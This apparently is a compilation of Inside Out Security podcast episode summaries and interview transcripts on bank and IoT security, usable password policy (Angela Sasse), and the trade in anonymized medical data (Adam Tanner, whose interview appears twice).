But let’s be honest and realistic. Bank security is no easy feat. They’re complicated systems with a larger attack surface to defend. Whereas attackers only need to find one vulnerability, sprinkle it with technical expertise, and gets to decide when and how the attack happens. Moreover, they don’t have to worry about bureaucracy, meeting compliance and following laws. The bottom-line is that attackers have more flexibility and are more agile.
In addition to evolving bank security threats, we also covered the following:
Recently, the Pew Research Center released a report highlighting what Americans know about cybersecurity. The intent of the survey and quiz was to understand how closely Americans are following best practices recommended by cybersecurity experts.
One question on the quiz reminded us that we’re entitled to one free copy of our credit report every 12 months from each of the three nationwide credit reporting companies. The reason behind this offering is that there is so much financial fraud.
And in an effort to curve banking scams, Wells Fargo introduced cardless ATMs, where customers can log into their app to request an eight-digit code to enter along with their PIN to retrieve cash.
Outside the US, the £1 coin gets a new look and line of defense. It uses an Integrated Secure Identification Systems, which gets authenticated at high speeds, with automated industry-leading detection levels. Plus, it’s harder to counterfeit and that’s exactly what we want!
Other themes and ideas we covered that weren’t part of the quiz:
Did the Inside Out Security panel – Cindy Ng, Mike Thompson, Kilian Englert, and Mike Buckbee - pass Pew’s cybersecurity quiz? Listen to find out!Besides talking to my fav security experts on the podcast, I’ve also been curious with what CISOs have been up to lately. Afterall they have the difficult job of keeping an organization’s network and data safe and secure. Plus, they tend to always be a few steps ahead in their thinking and planning.
After a few clicks on Twitter, I found a CISO at a predictive analytics SaaS platform who published a security manifesto. His goal was to build security awareness into every job, every role, and to give people a reason to choose the more secure path.
Another CSO at a team communication and collaboration tool company stressed the importance of transparency. This means communicating with their customers as much as possible - what he’s working on and how their bug bounty and features work.
As for what CISOs are reading and sharing, here are a few links to keep you on your toes and us talkin’:
Over the past few weeks, we’ve been debating a user’s threshold for his personal data seen in the public domain. For instance, did you know that housing information has always been public information? They are gathered from county records and the internet has just made the process of gathering the information less cumbersome. However, if our personal information leaks into the public domain - due a security lapse – it’s still not as serious as, say, a breach of 2 million records. The point is that many security experts will remind us that there is no perfect security as lapses and breaches will happen.
Meanwhile, I bemoan that no data should be left behind(all data should be protected!) and discuss my concerns with this week’s Inside Out Security Show panel – Cindy Ng, Mike Buckbee, Kilian Englert and Forrest Temple.
Additional articles we discussed:
In our "always-on" society, it's important that our conversation on IoT security continues with the question of data ownership.
It's making its way back into the limelight when Amazon, with the defendant’s permission, handed over user data in a trial.
Or what about a new software that captures all the angles from your face to build your security profile? Your face is such an intimate aspect to who you are, should we reduce that intimacy down to a data point?
I discussed these questions with this week’s Inside Out Security Show panel – Cindy Ng, Forrest Temple, Kilian Englert and Mike Buckbee.
Additional articles we discussed:
As more physical devices connect to the internet, I wondered about the responsibility IoT manufacturers have in building strong security systems within devices they create. There’s nothing like a lapse in security that could potentially halt the growth of a business or bring more cybersecurity awareness to a board.
I discussed these matters with this week’s Inside Out Security Show panel – Cindy Ng, Forrest Temple, Kilian Englert and Mike Buckbee.
First in line to be discussed was the shocking revelation that while car manufacturers enabled users to control their vehicles with an app, they never thought through what happens when it’s sold. What’s the harm? In the words of the car owner, “If I were a criminal, I could’ve stolen the car.”
In another alarming article, a security researcher recently discovered that anyone can connect and control a cuddly CloudPets via Bluetooth, recording private conversations with the built-in microphone. If you’re a parent who finds this IoT toy a cute way to leave messages with your child, your privacy may be at stake.
Additional recent news articles we discussed include:
I recently came across an article that gave me pause, “Why Data Breaches Don’t Hurt Stock Prices.” If that’s the case and if a breach doesn’t impact the sale of a company, does security matter?
So I asked the Inside Out Security Panel – Cindy Ng, Forrest Temple, Mike Buckbee and Kilian Englert.
They gently reminded me that there’s more than just the stock price to look at – brand, trust, as well as pending lawsuits.
In addition to these worries, proper breach notification is becoming a bigger responsibility. Is there a good or bad way to notify others about a breach? We discussed a controversial way a vendor disclosed their breach as well as some of the top stories of the week:
The debate between users volunteering their data for better service versus being perceived as a creepy company who covertly gathers user data remains a hot topic for the Inside Out Security panel –Cindy Ng, Kris Keyser, Mike Buckbee, and Kilian Englert.
There were two recent stories that triggered this debate. Recently, a smart television manufacturer agreed to pay a $2.2 million fine to the Federal Trade Commission for “collecting viewing data on 11 million consumer TVs without the consumer’s knowledge or consent.” Is that creepy or perhaps the argument could be made that viewing data only helps with the overall user experience?
Contrast the aforementioned story with one where psychologists and data scientists can measure a user’s voluntary Facebook likes to diagnose a personality type. This is known as psychometrics and measured using a model often referred to as OCEAN: openness (how open you are to new experiences?), conscientiousness (how much of a perfectionist are you?), extroversion (how sociable are you?), agreeableness (how considerate and cooperative you are?), and neuroticism (are you easily upset?). With your personality type identified, marketers believe that it can be used to influence users in a future purchasing decision or voting in a presidential election.
The panelists had vastly different views on acceptable and unacceptable behaviors.
Tool of the week: Git pre-commit hook to search for Amazon AWS API keys.
Other stories covered in this podcast:
In part two of my interview with Angela Sasse, Professor of Human-Centred Technology, she shared an engagement she had with British Telecom(BT).
The accountants at BT said that users were resetting passwords at a rate that overwhelmed the helpdesk's resources, making the cost untenable. The security team believed that the employees were the problem, meanwhile Sasse and her team thought otherwise. She likened the problem of requiring users to remember their passwords to memory exercises. And with Sasse’s help, they worked together to change the security policy that worked for both the company and the user.
We also covered the complexities of choosing the right form of authentication (i.e. passwords, 2FA or biometrics?), the pros and cons of user training, and the importance of listening to your users.
Angela Sasse: You know, when we originally published "Users Are Not the Enemy," we didn't say that it was...this first study was down in British Telecom, but they subsequently did out themselves as the organization. And they actually approached me originally, because they knew they had a problem, but the security people hadn't realized. They thought it was...the employees were the problem. They were getting heat from the accountants over the cost of running the password reset desks because their employees couldn't cope with the passwords. There was an awful lot of resets going on.
And those help desks got bigger and bigger, you know, both the internal ones and also the ones they were running for some of the services, you know, for the internet services they were running. And the accountants basically said, "The help desks have reached this size now, and this is untenable." You know, I mean, first of all, they can't grow anymore, and in the long run you've got to look to reducing this. You know, the cost is just untenable.
And so they originally said, "Oh, it's people's fault they can't remember their passwords," and whereas once we did the study, I said to them, "No, you're asking them to do memory exercises, to perform feats of memory that humans just can't do." And so, to me, actually, at this time, so this was in the late '90s, you know, it was clear to me that single sign-on, you know, that they really needed to look to bring a lot of the different systems they had behind a single sign-on. And that took a while. So that business case took, in total, five years to put that through the company and put it into action.
But there was a couple of things that we worked on with them to reduce the load as much as we could without having a single sign-on mechanism. So, for instance, to get the company to standardize the user IDs, because if you've got lots of different passwords, having lots of different user IDs on top of that really doesn't help. And the next thing we did, which is something that only really has happened very recently, is to increase the lifetime of passwords, so to, basically, say, like, changing them every 30 days is ridiculous, right? You're pushing people...you know, the only way they can remember that is by either using the same password everywhere or by having very easy passwords with just numbers at the end, you know, that they keep increasing whenever they have to change it. So we basically worked with them and put...you know, basically changed the policies.
And then they also took a view that for some of the infrequently-used systems, it was okay to write them down, to write passwords down, and then securing what they were writing down. That was the process over a period of time, and I think every time they made a change, they could see it was getting slightly better until the point then when they introduced a single sign-on. And I think a lot of organizations...I also know we worked with a financial services institution at the time where they went though a similar process.
But then, of course, with outsourcing, the ability to put everything behind a single sign-on was going away. So even if you had a single sign-on for your internal systems, with all the outsourced stuff, and, you know, if you have, like, your blue book and your gym is contracted out. You know, some even contract their HR out, and all of those service providers have their own access credentials. Then employees very quickly end up with, you know, maybe half a dozen or up to ten different passwords again. So that problem got back, and I think it's just taken a long time. About 10 years ago, some organizations experimented with having biometric access to our IT systems. And that sort of, it worked for some of them, but others just found that it wasn't robust enough, and you had far too high error rates. But effectively now we've seen a shift to two-factor authentication. That means that the memory part of it isn't so onerous anymore.
So I think it really culminated, for me, in when GCHQ released their password advice last year. They changed the government guidance, and that put into practice a lot of those things. We have observed, and some other research has also observed and basically advised, you know, to say that expiring passwords without good reason is counterproductive, that you really should move to two-factor authentication or another form of, you know, continuous authentication, to reduce the workload on users have to do, and so on.
And I think, actually, that the result of that was that now the CISOs who can understand that, who engage, who listen to their employees or their customers now effectively have the backing to say, "Just because I'm making things easier to use doesn't mean my security is worse. Basically, look at this. You know, the government agency responsible for our security now says that you've got to make security usable if you want it to be effective." And so they now have the backing, and they have something to point to, to make those changes. And it's less of a taking a personal risk and sticking their neck out, if you know what I mean.
Cindy Ng: Have you heard about...I think NIST said that SMS is not a good form of two-factor authentication, because you don't know if their phones are in the actual person's hands?
Angela Sasse: Well, I mean, my view is you can...you know, you've got to really see what risks for those different things are. You know, that is only true if, A, the phone has been taken away from the person and if they have not put any form of access control on it. And that's really changed. The vast majority of phone users do protect access to their phone. They put either a PIN or a fingerprint authentication on it, right? And I think in that case it's perfectly reasonable.
Cindy Ng: And in terms of biometrics, you mentioned that it wasn't working when organizations were attempting to use biometrics as a form to authenticate. What form, their eyeball, their thumbprint?
Angela Sasse: It varies. So, I've seen thumbprint work very well in some organizations and not well in others. Iris recognition is quite widely used in some high-end, because it's a fairly expensive biometric...
Cindy Ng: Or voice?
Angela Sasse: Voice is now making, after years of being a sort of, like, bit of a sleeping beauty, it's now making great strides, you know, in banking, for telephone authentication.
Cindy Ng: How are you able to tie usability and security back to the bottom line?
Angela Sasse: That actually really is research that's happening now. Very occasionally, you find there's a very, very clear, now, business metric that will tell you how well you're doing, you know, so that when, for instance, security has an impact on customers, right? So we know, for instance, that the kind of two-factor authentication that the banks introduced here in the UK upset a lot of customers and that they changed as a result of that. And that basically really pushed the development of phone-based banking, because they thought, you know, they could actually sort of... Because, really, I think by the time they rolled out the two-factor authentication using these various card readers and things like that, it was kind of like it was already felt to be quite clunky and difficult. And they felt that they could actually make it a lot easier to use and more accessible on the phone and also more acceptable to many customers on the phone. I think that's...you know, in the financial sector we've seen those changes happening there.
Cindy Ng: Is there a final message or something that I didn't cover that you think is worth expressing?
Angela Sasse: Well, I think...so one of the things I find quite helpful when I try and get security people to understand what this whole, you know, how do you actually work with the end users. Because at the end of the day, I really believe this, we have to work together, you know? If we don't work together, that's the whole point of the "Users Are Not the Enemy" paper, right? If the good guys don't work together, then you're really making the attackers' job a lot easier. We need to work together, and we want to make it easy for people to do the right thing. We don't wanna get too much into the way of their activities, so we need to then be very clear about what they're expected to do and things that they're expected not to do as a way of making sure the security that we've deployed actually works.
And I think, to deflect, one of the things I always use is the 90-10 rule. So, whilst a lot of security experts, you know, their first thought is, "Oh, can I provide some user training or some user education to make them, you know, able to use the security I've put in place?" I would actually point out, it's user education that's for about 10% of cases. 90% of the cases is change the technology to make it easier to use. And, you know, it's only in 10% of cases, is it that you're changing people's knowledge or changing people's behavior in order to do that. So it's something you do very occasionally. It's not the default position.
And the second things is that I've sometimes seen that you can't change everything at once. Even if you've got a very ambitious program to overhaul security in your organization, basically, you've gotta acknowledge that you can't shut down the company. The core business still has to run. That means you have a limited amount of attention, and people have a limited amount of time to deal with this. So phasing things - you know, when you're changing, you know, you change one or two bad habits first. Once they have bedded in, you then do the next couple of ones and so on. So it's a rolling, ongoing program that you have a longer period of time.
Cindy Ng: Is there a priorities list?
Angela Sasse: There isn't a general blueprint. The organization has to develop that plan themselves based on their risk assessment and risk management plan. So they have to identify the sort of, you know, that they say, "Here is the security mechanisms that we really need to work to mitigate quite a key risk." And clearly those are the behaviors that need to be transformed first.
Cindy Ng: Usually, it's being compliant or the regulators making sure that they're not in trouble with the... That's a huge driving force too.
Angela Sasse: Clearly. I mean, if otherwise you lose your license or you're not able to operate, it is very important to be compliant. But you should, you know...I always think it's very important that organizations make sure that their mechanism is working, as opposed to, you know, I basically can say, "I have a policy. This is what people are supposed to do," and then turn a blind eye to the fact that most of them, most of the time, aren't doing it.
This week, we continue our ongoing ransomware discussion with the Inside Out Security Show panel - Cindy Ng, Kilian Englert, Mike Buckbee, and Mike Thompson.
But before we launched into our conversation, as an icebreaker, I asked the panel what their advice would be to this tired sysadmin who deleted the wrong directory on the wrong server?
Buckbee: Do exactly what they did to fix the problem.
Englert: It happens, just have to recover and move on.
Thompson: Always take a snapshot before touching your production server.
Back to Ransomware
I likened this singular, life-changing malware to Emperor Palpatine. Why? The scammers try to be your friend and provide customer support. Meanwhile, they’re clever about extorting money from you.
There were a few interesting ransomware stories that we covered:
Inspired by this tweet, I asked the Inside Out Security Show panel – Cindy Ng, Kilian Englert, Mike Buckbee, and Alan Cizenski - if they could add an extra factor of authentication, what would it be?
Plus, we covered a few hot topics:
Tool for a Sysadmin
PsHosts: Powershell Cmdlet Module for modifying the hosts file on Windows
Adam Tanner is the author of "Our Bodies, Our Data", which tells the story of a hidden dark market in drug prescription and other medical data. In recent years hackers have been able to steal health data on a massive scale -- remember Anthem? In this second part of our interview, we explore the implications of hacked medical data. If hackers get into a data brokers' drug databases and combine with previously stolen medical insurance records, will they rule the world?
Adam Tanner: Well, I'm glad to be with you.
IOS: We've also been writing about medical data privacy for our Inside Out Security blog. And we're familiar with how, for example, hospital discharge records can be legally sold to the private sector.
But in your new book, and this is a bit of a shock to me, you describe how pharmacies and others sell prescription drug records to data brokers. Can you tell us more about the story you've uncovered?
AT: Basically, throughout your journey as a patient into the healthcare system, information about you is sold. It has nothing to do with your direct treatment. It has to do with commercial businesses wanting to gain insight about you and your doctor, largely, for sales and marketing.
So, take the first step. You go to your doctor's office. The door is shut. You tell your doctor your intimate medical problems. The information that is entered into the doctor's electronic health system may be sold, commercially, as may the prescription that you pick up at the pharmacy or the blood tests that you take or the urine tests at the testing lab. The insurance company that pays for all of this or subsidizes part of this, may also sell the information.
That information about you is anonymized. That means that your information contains your medical condition, your date of birth, your doctor's name, your gender, all or part of your postal zip code, but it doesn't have your name on it.
All of that trade is allowed, under U.S. rules.
IOS: You mean under HIPAA?
AT: That's right. Now this may be surprising to many people who would ask this question, "How can this be legal under current rules?" Well, HIPAA says that if you take out the name and anonymize according to certain standards, it's no longer your data. You will no longer have any say over what happens to it. You don't have to consent to the trade of it. Outsiders can do whatever they want with that.
I think a lot of people would be surprised to learn that. Very few patients know about it. Even doctors and pharmacists and others who are in the system don't know that there's this multi-billion-dollar trade.
IOS:Right … we've written about the de-identification process, which it seems like it's the right thing to do, in a way, because you're removing all the identifiers, and that includes zip code information, other geo information. It seems that for research purposes that would be okay. Do you agree with that, or not?
AT: So, these commercial companies, and some of the names may be well-known to us, companies such as IBM Watson Health, GE, LexisNexis, and the largest of them all may not be well-known to the general public, which is Quintiles and IMS. These companies have dossiers on hundreds of millions of patients worldwide. That means that they have medical information about you that extends over time, different procedures you've had done, different visits, different tests and so on, put together in a file that goes back for years.
Now, when you have that much information, even if it only has your date of birth, your doctor's name, your zip code, but not your name, not your Social Security number, not things like that, it's increasingly possible to identify people from that. Let me give you an example.
I'm talking to you now from Fairbanks, Alaska, where I'm teaching for a year at the university here. I lived, before that, in Boston, Massachusetts, and before that, in Belgrade, Serbia. I may be the only man of my age who meets that specific profile!
So, if you knew those three pieces of information about me and had medical information from those years, I might be identifiable, even in a haystack of millions of different other people.
IOS: Yeah …We have written about that as well in the blog. We call these quasi-identifiers. They're not the traditional kind of identifiers, but they're other bits of information, as you pointed out, that can be used to sort of re-identify. Usually it's a small subset, but not always. And that this information would seem also should be protected as well in some way. So, do you think that the laws are keeping up with this?
AT: HIPAA was written 20 years ago, and the HIPAA rules say that you can freely trade our patient information if it is anonymized to a certain standard. Now, the technology has gone forward, dramatically, since then.
So, the ability to store things very cheaply and the ability to scroll through them is much more sophisticated today than it was when those rules came into effect. For that reason, I think it's a worthwhile time to have a discussion now. Is this the best system? Is this what we want to do?
Interestingly, the system of the free trade in our patient information has evolved because commercial companies have decided this is what they'd want to do. There has not been an open public discussion of what is best for society, what is best for patients, what is best for science, and so on. This is just a system that evolved.
I'm saying, in writing this book, "Our Bodies, Our Data," that it is maybe worthwhile that we re-examine where we're at right now and say, "Do we want to have better privacy protection? Do we want to have a different system of contributing to science than we do now?"
IOS: I guess what also surprised me was that you say that pharmacies, for example, can sell the drug records, as long as it's anonymized. You would think that the drug companies would be against that. It's sort of leaking out their information to their competitors, in some way. In other words, information goes to the data brokers and then gets resold to the drug companies.
AT: Well, but you have to understand that everybody in what I call this big-data health bazaar is making money off of it. So, a large pharmacy chain, such as CVS or Walgreen's, they may make tens of millions of dollars in selling copies of these prescriptions to data miners.
Drug companies are particularly interested in buying this information because this information is doctor-identified. It says that Dr. Jones in Pittsburgh prescribes drug A almost all the time, rather than drug B. So, the company that makes drug B may send a sales rep to the doctor and say, "Doctor, here's some free samples. Let's go out to lunch. Let me tell you about how great drug B is."
So, this is because there exists these doctor profiles on individual doctors across the country, that are used for sales and marketing, for very sophisticated kind of targeting.
IOS: So, in an indirect way, the drug companies can learn about the other drug companies' sales patterns, and then say, "Oh, let me go in there and see if I can take that business away." Is that sort of the way it's working?
AT: In essence, yes. The origins of this trade date back to the 1950s. In its first form, these data companies, such as IMS Health, what they did was just telling companies what drugs sold in what market. Company A has 87% of the market. Their rival has 13% of the market. When medical information began to become digitized in the 1960s and '70s and evermore since then, there was a new opportunity to trade this data.
So, all of a sudden, insurance companies and middle-men connecting up these companies, and electronic health records providers and others, had a product that they could sell easily, without a lot of work, and data miners were eager to buy this and produce new products for mostly the pharmaceutical companies, but there are other buyers as well.
IOS: I wanted to get back to another point you mentioned, in that even with anonymized data records of medical records, with all the other information that's out there, you can re-identify or at least limit, perhaps, the pool of people who that data would apply to.
What's even more frightening now is that hackers have been stealing health records like crazy over the last couple of years. So, there's a whole dark market of hacked medical data that, I guess, if they got into this IMS database, they would have the keys to the kingdom, in a way.
Am I being too paranoid here?
AT: Well, no, you correctly point out that there has been a sharp upswing in hacking into medical records. That can happen into a small, individual practice, or it could happen into a large insurance company.
And in fact, the largest hacking attack of medical records in the last couple of years has been into Anthem Health, which is the Blue Cross Blue Shield company. Almost 80 million records were hacked in that.
So even people that did... I was hacked in that, even though I was not, at the time, a customer of them or had never been a customer of them, but they... One company that I dealt with outsourced to someone else, who outsourced to them. So, all of a sudden, this information can be in circulation.
There’s a government website people can look at, and you'll see, every day or two, there are new hackings. Sometimes it involves a few thousand names and an obscure local clinic. Sometimes it'll be a major company, such as a lab test company, and millions of names could be impacted.
So, this is something definitely to be concerned about. Yes, you could take these hacked records and match them with anonymized records to try to figure out who people are, but I should point out that there is no recorded instance of hackers getting into these anonymized dossiers by the big data miners.
IOS: Right. We hope so!
AT: I say recorded or acknowledged instance.
IOS: Right. Right. But there's now been sort of an awareness of cyber gangs and cyber terrorism and then the use of, let's say, records for blackmail purposes.
I don't want to get too paranoid here, but it seems like there's just a potential for just a lot of bad possibilities. Almost frightening possibilities with all this potential data out there.
AT: Well, we have heard recently about rumors of an alleged dossier involving Donald Trump and Russia.
IOS: Exactly.
AT: And information that... If you think about what kind of information could be most damaging or harmful to someone, it could be financial information. It could be sexual information, or it could be health information.
IOS: Yeah, or someone using... or has a prescription to a certain drug of some sort. I'm not suggesting anything, but that... All that information together could have sort of lots of implications, just, you know, political implications, let's say.
AT: I mean if you know that someone takes a drug that's commonly used for a mental health problem, that could be information used against someone. It could be used to deny them life insurance. It could be used to deny them a promotion or a job offer. It could be used by rivals in different ways to humiliate people. So, this medical information is quite powerful.
One person who has experienced this and spoken publicly about it is the actor, Charlie Sheen. He tested positive for HIV. Others somehow learned of it and blackmailed him. He said he paid millions of dollars to keep that information from going public, before he decided finally that he would stop paying it, and he'd have to tell the world about his medical condition.
IOS: Actually I was not aware of the payments he was making. That's just astonishing. So, is there any hope here? Do you see some remedies, through maybe regulations or enforcement of existing laws? Or perhaps we need new laws?
AT: As I mentioned, the current rules, HIPAA, allows for the free trade of your data if it's anonymized. Now, I think, given the growth of sophistication in computing, that we should change what the rule is and to define our medical data as any medical information about us, whether or not it's anonymized.
So, if a doctor is writing in the electronic health record, you should have a say as to whether or not that information is going to be used elsewhere.
A little side point I should mention. There are a lot of good scientists and researchers who want data to see if they can gain insights into disease and new medications. I think people should have the choice whether or not they want to contribute to those efforts.
So, you know, there's a lot of good efforts. There's a government effort under way now to gather a million DNA samples from people to make available to science. So, if people want to participate in that, and they think that's good work, they should definitely be encouraged to do so, but I think they should have the say and decide for themselves.
And so far, we don't really have that system. So, by redefining what patient data is, to say, "Medical information about a patient, whether or not it's anonymized," I think that would give us the power to do that.
IOS: So effectively, you're saying the patient owns the data, is the owner, and then would have to give consent for the data to be used. Is that, about right?
AT: I think so. But on the other hand, as I mentioned, I've written this book to encourage this discussion. The problem we have right now is that the trade is so opaque.
Companies are extremely reluctant to talk about this commercial trade. So, they do occasionally say that, "Oh, this is great for science and for medicine, and all of these great things will happen." Well, if that is so fantastic, let's have this discussion where everyone will say, "All right. Here's how we use the data. Here's how we share it. Here's how we sell it."
Then let people in on it and decide whether they really want that system or not. But it's hard to have that intelligent policy discussion, what's best for the whole country, if industry has decided for itself how to proceed without involving others.
IOS: Well, I'm so glad you've written this book. This will, I'm hoping, will promote the discussion that you're talking about. Well, this has been great. I want to thank you for the interview. So, by the way, where can our listeners reach out to you on social media? Do you have a handle on Twitter? Or Facebook?
AT: Well, I'm @datacurtain and I have a webpage, which is http://adamtanner.news/
IOS: Wonderful. Thank you very much, Adam.
While I thought we could ride on our recent successes for just a bit longer, attackers are back in full swing, filling my twitter feed with latest jaw dropping security news.
As I waded in worry, I stumbled upon an interesting Benjamin Franklin quote, “Distrust and caution are the parents of security.”
Should distrust and caution be the parents of security? Who or what should the parents of security be?
I brought these questions to the Inside Out Security Show panelist – Cindy Ng, Kilian Englert, Mike Buckbee, and Forrest Temple.
Also, here are some of the stories we covered.
Sysadmin Tool: Nishang - PowerShell for penetration testing and offensive security.
With ransomware and data breaches driving headlines, it can feel like security pros are always one step behind. However, I recently found a few stories that I thought were worth celebrating.
Not everyone on the Inside Out Security Show panel – Cindy Ng, Mike Buckbee, Kilian Englert, and Kris Keyser – thought the stories were good news.
Nonetheless, I think that over time, as technologies mature, they do become more stable and secure. A few steps forward, a few steps back, right?
Here are some of the stories we covered. What do you think?
Sysadmin Tool: How to set up a SPF record to prevent spam and spear phishing
Adam Tanner is the author of "Our Bodies, Our Data", which tells the story of a hidden dark market in drug prescription and other medical data. Adam explains how the sale of "anonymized" data is a multi-billion dollar business not covered by HIPPA rules. In this first part of our interview, we learn from Adam how the medical data brokers got started and why it's legal.
Adam Tanner: Well, I'm glad to be with you.
IOS: We've also been writing about medical data privacy for our Inside Out Security blog. And we're familiar with how, for example, hospital discharge records can be legally sold to the private sector.
But in your new book, and this is a bit of a shock to me, you describe how pharmacies and others sell prescription drug records to data brokers. Can you tell us more about the story you've uncovered?
AT: Basically, throughout your journey as a patient into the healthcare system, information about you is sold. It has nothing to do with your direct treatment. It has to do with commercial businesses wanting to gain insight about you and your doctor, largely, for sales and marketing.
So, take the first step. You go to your doctor's office. The door is shut. You tell your doctor your intimate medical problems. The information that is entered into the doctor's electronic health system may be sold, commercially, as may the prescription that you pick up at the pharmacy or the blood tests that you take or the urine tests at the testing lab. The insurance company that pays for all of this or subsidizes part of this, may also sell the information.
That information about you is anonymized. That means that your information contains your medical condition, your date of birth, your doctor's name, your gender, all or part of your postal zip code, but it doesn't have your name on it.
All of that trade is allowed, under U.S. rules.
IOS: You mean under HIPAA?
AT: That's right. Now this may be surprising to many people who would ask this question, "How can this be legal under current rules?" Well, HIPAA says that if you take out the name and anonymize according to certain standards, it's no longer your data. You will no longer have any say over what happens to it. You don't have to consent to the trade of it. Outsiders can do whatever they want with that.
I think a lot of people would be surprised to learn that. Very few patients know about it. Even doctors and pharmacists and others who are in the system don't know that there's this multi-billion-dollar trade.
IOS:Right … we've written about the de-identification process, which it seems like it's the right thing to do, in a way, because you're removing all the identifiers, and that includes zip code information, other geo information. It seems that for research purposes that would be okay. Do you agree with that, or not?
AT: So, these commercial companies, and some of the names may be well-known to us, companies such as IBM Watson Health, GE, LexisNexis, and the largest of them all may not be well-known to the general public, which is Quintiles and IMS. These companies have dossiers on hundreds of millions of patients worldwide. That means that they have medical information about you that extends over time, different procedures you've had done, different visits, different tests and so on, put together in a file that goes back for years.
Now, when you have that much information, even if it only has your date of birth, your doctor's name, your zip code, but not your name, not your Social Security number, not things like that, it's increasingly possible to identify people from that. Let me give you an example.
I'm talking to you now from Fairbanks, Alaska, where I'm teaching for a year at the university here. I lived, before that, in Boston, Massachusetts, and before that, in Belgrade, Serbia. I may be the only man of my age who meets that specific profile!
So, if you knew those three pieces of information about me and had medical information from those years, I might be identifiable, even in a haystack of millions of different other people.
IOS: Yeah …We have written about that as well in the blog. We call these quasi-identifiers. They're not the traditional kind of identifiers, but they're other bits of information, as you pointed out, that can be used to sort of re-identify. Usually it's a small subset, but not always. And that this information would seem also should be protected as well in some way. So, do you think that the laws are keeping up with this?
AT: HIPAA was written 20 years ago, and the HIPAA rules say that you can freely trade our patient information if it is anonymized to a certain standard. Now, the technology has gone forward, dramatically, since then.
So, the ability to store things very cheaply and the ability to scroll through them is much more sophisticated today than it was when those rules came into effect. For that reason, I think it's a worthwhile time to have a discussion now. Is this the best system? Is this what we want to do?
Interestingly, the system of the free trade in our patient information has evolved because commercial companies have decided this is what they'd want to do. There has not been an open public discussion of what is best for society, what is best for patients, what is best for science, and so on. This is just a system that evolved.
I'm saying, in writing this book, "Our Bodies, Our Data," that it is maybe worthwhile that we re-examine where we're at right now and say, "Do we want to have better privacy protection? Do we want to have a different system of contributing to science than we do now?"
IOS: I guess what also surprised me was that you say that pharmacies, for example, can sell the drug records, as long as it's anonymized. You would think that the drug companies would be against that. It's sort of leaking out their information to their competitors, in some way. In other words, information goes to the data brokers and then gets resold to the drug companies.
AT: Well, but you have to understand that everybody in what I call this big-data health bazaar is making money off of it. So, a large pharmacy chain, such as CVS or Walgreen's, they may make tens of millions of dollars in selling copies of these prescriptions to data miners.
Drug companies are particularly interested in buying this information because this information is doctor-identified. It says that Dr. Jones in Pittsburgh prescribes drug A almost all the time, rather than drug B. So, the company that makes drug B may send a sales rep to the doctor and say, "Doctor, here's some free samples. Let's go out to lunch. Let me tell you about how great drug B is."
So, this is because there exists these doctor profiles on individual doctors across the country, that are used for sales and marketing, for very sophisticated kind of targeting.
IOS: So, in an indirect way, the drug companies can learn about the other drug companies' sales patterns, and then say, "Oh, let me go in there and see if I can take that business away." Is that sort of the way it's working?
AT: In essence, yes. The origins of this trade date back to the 1950s. In its first form, these data companies, such as IMS Health, what they did was just telling companies what drugs sold in what market. Company A has 87% of the market. Their rival has 13% of the market. When medical information began to become digitized in the 1960s and '70s and evermore since then, there was a new opportunity to trade this data.
So, all of a sudden, insurance companies and middle-men connecting up these companies, and electronic health records providers and others, had a product that they could sell easily, without a lot of work, and data miners were eager to buy this and produce new products for mostly the pharmaceutical companies, but there are other buyers as well.
IOS: I wanted to get back to another point you mentioned, in that even with anonymized data records of medical records, with all the other information that's out there, you can re-identify or at least limit, perhaps, the pool of people who that data would apply to.
What's even more frightening now is that hackers have been stealing health records like crazy over the last couple of years. So, there's a whole dark market of hacked medical data that, I guess, if they got into this IMS database, they would have the keys to the kingdom, in a way.
Am I being too paranoid here?
AT: Well, no, you correctly point out that there has been a sharp upswing in hacking into medical records. That can happen into a small, individual practice, or it could happen into a large insurance company.
And in fact, the largest hacking attack of medical records in the last couple of years has been into Anthem Health, which is the Blue Cross Blue Shield company. Almost 80 million records were hacked in that.
So even people that did... I was hacked in that, even though I was not, at the time, a customer of them or had never been a customer of them, but they... One company that I dealt with outsourced to someone else, who outsourced to them. So, all of a sudden, this information can be in circulation.
There’s a government website people can look at, and you'll see, every day or two, there are new hackings. Sometimes it involves a few thousand names and an obscure local clinic. Sometimes it'll be a major company, such as a lab test company, and millions of names could be impacted.
So, this is something definitely to be concerned about. Yes, you could take these hacked records and match them with anonymized records to try to figure out who people are, but I should point out that there is no recorded instance of hackers getting into these anonymized dossiers by the big data miners.
IOS: Right. We hope so!
AT: I say recorded or acknowledged instance.
IOS: Right. Right. But there's now been sort of an awareness of cyber gangs and cyber terrorism and then the use of, let's say, records for blackmail purposes.
I don't want to get too paranoid here, but it seems like there's just a potential for just a lot of bad possibilities. Almost frightening possibilities with all this potential data out there.
AT: Well, we have heard recently about rumors of an alleged dossier involving Donald Trump and Russia.
IOS: Exactly.
AT: And information that... If you think about what kind of information could be most damaging or harmful to someone, it could be financial information. It could be sexual information, or it could be health information.
IOS: Yeah, or someone using... or has a prescription to a certain drug of some sort. I'm not suggesting anything, but that... All that information together could have sort of lots of implications, just, you know, political implications, let's say.
AT: I mean if you know that someone takes a drug that's commonly used for a mental health problem, that could be information used against someone. It could be used to deny them life insurance. It could be used to deny them a promotion or a job offer. It could be used by rivals in different ways to humiliate people. So, this medical information is quite powerful.
One person who has experienced this and spoken publicly about it is the actor, Charlie Sheen. He tested positive for HIV. Others somehow learned of it and blackmailed him. He said he paid millions of dollars to keep that information from going public, before he decided finally that he would stop paying it, and he'd have to tell the world about his medical condition.
IOS: Actually I was not aware of the payments he was making. That's just astonishing. So, is there any hope here? Do you see some remedies, through maybe regulations or enforcement of existing laws? Or perhaps we need new laws?
AT: As I mentioned, the current rules, HIPAA, allows for the free trade of your data if it's anonymized. Now, I think, given the growth of sophistication in computing, that we should change what the rule is and to define our medical data as any medical information about us, whether or not it's anonymized.
So, if a doctor is writing in the electronic health record, you should have a say as to whether or not that information is going to be used elsewhere.
A little side point I should mention. There are a lot of good scientists and researchers who want data to see if they can gain insights into disease and new medications. I think people should have the choice whether or not they want to contribute to those efforts.
So, you know, there's a lot of good efforts. There's a government effort under way now to gather a million DNA samples from people to make available to science. So, if people want to participate in that, and they think that's good work, they should definitely be encouraged to do so, but I think they should have the say and decide for themselves.
And so far, we don't really have that system. So, by redefining what patient data is, to say, "Medical information about a patient, whether or not it's anonymized," I think that would give us the power to do that.
IOS: So effectively, you're saying the patient owns the data, is the owner, and then would have to give consent for the data to be used. Is that, about right?
AT: I think so. But on the other hand, as I mentioned, I've written this book to encourage this discussion. The problem we have right now is that the trade is so opaque.
